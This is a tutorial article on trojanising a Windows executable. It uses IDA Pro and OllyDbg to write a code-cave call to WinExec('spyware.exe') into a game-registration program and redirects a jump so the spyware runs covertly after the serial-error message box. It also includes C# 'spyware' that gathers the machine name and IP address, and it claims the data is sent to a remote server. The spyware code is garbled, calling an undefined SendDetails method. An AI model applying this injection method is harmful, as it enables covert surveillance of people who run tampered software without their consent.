Implanting malicious code in the form of spyware to an existing running process is a very sophisticated task. Before the advent of disassemblers or patching tools, the malevolent code is usually invoked from the hard-core programming code that was a very exhaustive process in itself because we had gone through with programming code written especially in C or VC++. This paper shows exclusively how to invoke a covert code along with the foremost executable using OllyDbg and IDA Pro Disassemblers. Such covert malicious code is triggered without permission from the user; more precisely, the moment the specific method of the leading exe executes, the spyware becomes automatically activated surreptitiously.
Essential
The subsequent operation requires exhaustive understanding of Hexadecimal Code and Assembly Programming. The following lists the tools of the trade:
- The Victim Binary
- Spyware Executable
- OllyDbg
- IDA Pro Interactive Dissembler
The Target Binary (Victim)
We shall deploy the spyware in a simple Game Registration executable to showcase the code injections mechanism. The Game Registration typically requires serial keys to validate the authentic copy of this product and register or enable the full version as below.
![Target GUI]()
Figure 1.1: Target GUI
This EXE is chosen to be the victim for infection with the covert spyware. It doesn't matter what the actual Name is and the serial keys of that program. We are in fact, not provided such sensitive information. The key matter of interest for the reverse engineer is the subsequent Error box that typically appears when serial keys are not validated.
![Error Message in Target]()
Figure 1.2: Error Message in Target
This Error message box would become the entry point of the malicious covert code. The moment the user is confronted with the previous error message box, the spyware becomes executed and that is what we are trying to do in this paper.
Spyware Code
Well, the following code will produce a simple spyware program which typically shows the machine name and IP address of the computer where it runs and returns such critical information to the hacker server.
- Using System;
- using System.Net;
- using System.IO;
- using System.Windows.Forms;
-
- namespace victimIP
- {
- public partial class Form1 : Form
- {
- public Form1()
- {
- InitializeComponent();
- }
-
- private void Form1_Load(object sender, EventArgs e)
- {
- try
- {
- string strHostName = Dns.GetHostName();
- label4.Text = strHostName;
- label5.Text = GetIP();
- }
- catch (Exception)
- {
- MessageBox.Show("Unable to Connect Internet");
- }
- }
- static string GetIP()
- {
-
- WebRequest request = WebRequest.Create("http://checkip.dyndns.org");
- WebResponse response = request.GetResponse();
- StreamReader stream = new StreamReader(response.GetResponseStream());
-
-
- string ipAddress = stream.ReadToEnd();
-
-
- return ipAddress.
- Replace("<html>
- <head><title>Current IP Check</title></head>
- <body>Current IP Address: ", string.Empty).
- Replace("</body></html>", string.Empty);
-
- }
- private void button2_Click(object sender, EventArgs e)
- {
- SendDetails();
- Application.Exit();
- }
- }
- }
We don't need to go into the details of the spyware code. It could be any exe program indeed which is injected into a binary as the means of this paper. After compiling that code, it will look as in the following figure. It is showing a fake value of the computer name and IP address because crucial values are not being disclosed for security purposes.
![The Spyware GUI]()
Figure 1.3: The Spyware GUI
Victim Binary AnalysisOne question might bother you, why do we need IDA Pro, since we can do code injection using OllyDbg itself? IDA Pro in fact, assists you to identify the entry point instruction code of the jump statement where from the message box assembly instruction starts to execute. As we have described earlier, the prime matter of interest is to get the details of the message box activation code. Here, we can easily identify the first message box occurrence after the 0040115E offset. Well, this code manipulated a couple of other message boxes indeed. But we have to recognize the very first message box existence.
![Message Box invoking instruction in Target]()
Figure 1.4: Message Box invoking instruction in Target
So, we will search at
0040115E offset in the OllyDbg to find the message box assembly code to be modified to suit our needs. We can duly confirm the message box occurrence by placing a breakpoint at 0040115E in IDA Pro and start debugging. If we entered the short name then the graph view of the assembly code clearly indicates the execution flow towards the message box code as in the following:
![Target Execution Flow]()
Figure 1.5: Target Execution Flow
Spyware Injection
It's now showtime. Open the victim.exe binary in the OllyDbg to inject the spyware code. Here, the $ sign at offset 004015ED indicates the entry point of the executable as in the following:
![Target Entry Point in OllyDbg]()
Figure 1.6: Target Entry Point in OllyDbg
Every executable has some empty space referred to as Code Caves where we can place or inject any external binary code. So, if you scroll down a little bit, you will easily identify the blank area named DB 00 or NOP in the assembly code.
NOTE: Sometimes the assembly code hides the form of DB 00 instructions code caves. So press CTRL+A to unhide them.
![Empty Regions Code caves in Target]()
Figure 1.7: Empty Regions (Code caves) in Target
As from the previous Figure 1.7, the DB 00 instruction starts from the 00405188 offset. So, we shall place our external spyware code in these code caves. So select a couple of code cave instructions and right-click, choose Binary and then edit as in the following:
![Binary Editing in Target]()
Figure 1.8: Binary Editing in Target
NOTE: place both victim.exe and spyware.exe into a single directory folder.
Now, label the spyware program executable as
spyware.exe in the ASCII box, since we have selected code caves from 0040518A, which means start editing from this instruction. Its corresponding hex code is automatically generated and placed at the 0040518A offset.
![Placing Spyware Name in Target]()
Figure 1.9: Placing Spyware Name in Target
NOTE: The assembly is a strict case-sensitive language. So be cautious when entering the names in the ASCII box.
After pressing the OK button in the Figure 1.9, some raw uncomprehendable code is generated at offset 0040518A in the Red color as in the following:
![Injected Spyware code in Target]()
Figure 1.10: Injected Spyware code in Target
Don't worry, just analyze the code by pressing CTRL+ A now and this time, we get the original entered code which virtually shows the spyware victim.exe name as in the following:
![Analysis in Target]()
Figure 1.11: Analysis in Target
Now, we have to write the spyware offset address value into memory. However, move forward just one step and at offset 00405195, press the space bar button. Here, we found the assemble code box. Just enter PUSH 1 here and click on the Assemble button.
![Injecting PUSH instruction Target]()
Figure 1.12: Injecting PUSH instruction Target
Again go to the 00405197 offset and press the space bar; here enter the PUSH 40518A code which pushes the spyware exe instruction into memory.
![Injecting Spyware name in PUSH]()
Figure 1.13: Injecting Spyware name in PUSH
Here, note that we are giving the reference of spyware.exe located at offset 0040518A to 00405198 as in the following:
![Giving Spyware name in PUSH]()
Figure 1.14: Giving Spyware name in PUSH
Our spyware has the *.exe format. So we have to instruct the Assembly code by calling the CALL WinExec instruction that we are injecting an external executable which has of course .exe extension.
![Calling Exe in Assembly Language]()
Figure 1.15: Calling Exe in Assembly Language
After finishing with the code injection for the spyware, the modified assembly looks such as in the following:
![Injected Assembly Code]()
Figure 1.16: Injected Assembly Code
We now must connect that new injected code with the message box occurrence instruction, otherwise it won't be executed. As a reference of Figure 1.4, press CTRL+G and enter the 0040115E offset.
![Jump to 0040115E via Expression]()
Figure 1.17: Jump to 0040115E via Expression
This action lets us reach directly the entry point of the first message box as in the following. Here, we have to perform some significant modifications.
![Message Box code entry point]()
Figure 1.18: Message Box code entry point
Now, select the 0040115E offset and press the space bar, then copy the
JNB 00401189 instruction into the clipboard as in the following:
![Copy the code]()
Figure 1.19: Copy the code
Thereafter, return to the inject code by pressing the “-“ (minus) button, there select offset 004051A1 to assemble the new code and press the space button and paste in the JNB 00401189 instruction. We shall discuss shortly what we are doing.
![Paste instruction]()
Figure 1.20: Paste instruction
Okay, now copy the offset address 00405196 in the clipboard from the first PUSH 1 in the new injected code.
![Copy offsets]()
Figure 1.21: Copy offsets
Again go to offset 0040115E where the message box code is located, select the instruction set at 0040115E and press the space bar. Finally replace the existing code with the new assembly instruction JNB 00405196 here.
![Assemble instruction]()
Figure 1.22: Assemble instruction
So, what we are actually doing here is, first we give the reference of the PUSH 1 instruction at offset (00405196) to jump the instruction located at offset 0040115E. Secondly, paste the JNB 00401189 instruction to 004051A1 offset as in the following:
![Graph diagram of offsets jumping]()
Figure 1.23: Graph diagram of offsets jumping
Basically, the previous figure indicates that after entering the user name and serial key in the victim.exe, first the error message box would be displayed and then our spyware program activates.
We are done with the code injections. Now make the changes permanent and write the modified bytes into memory by right-clicking on the ASM code and select the Copy to Executable option, where choose All Modifications as in the following.
![Saving changes]()
Figure 1.24: Saving changes
Now, select the Copy all option in the forthcoming dialog box, that produces a separate dialog box as in the following where the final assembly code collectively resides.
![New Assemble code]()
Figure 1.25: New Assemble code
Finally, close the dialog box in Figure 1.25. The moment, you close the dialog box, the save as dialog box will appear and it asks for a new name to the patched exe file. We shall provide victim_Patched.exe as in the following:
![save as binary]()
Figure 1.26: Save As binary
Now, run the victim_Patched.exe and enter any fake values such as a user name and serial key. It is obvious that such entered credentials are invalidated and an error message will be displayed.
![Testing]()
The moment the error message appears about invalid credentials and we move forward by clicking the OK button, the spyware program shall be automatically activated and shows the machine name and IP address on which it is running and later sends back the information to a remote server.
![Spyware program]()
Figure 1.28: Spyware program
Final Note
This rare research paper presents a step-by-step tutorial of injecting a malicious spyware program into any executable using IDA Pro and OllyDbg. The IDA Pro was basically employed to identify the entry point message box occurrence and OllyDbg in fact, implanting the existing exe. Basically, this tutorial is showing how to place an exe into another exe. The idea behind code injection is to identify the occurrence of the entry point referred to as the triggering point to the injected exe indeed and later modify the JUMP statements to divert the execution towards the injected code.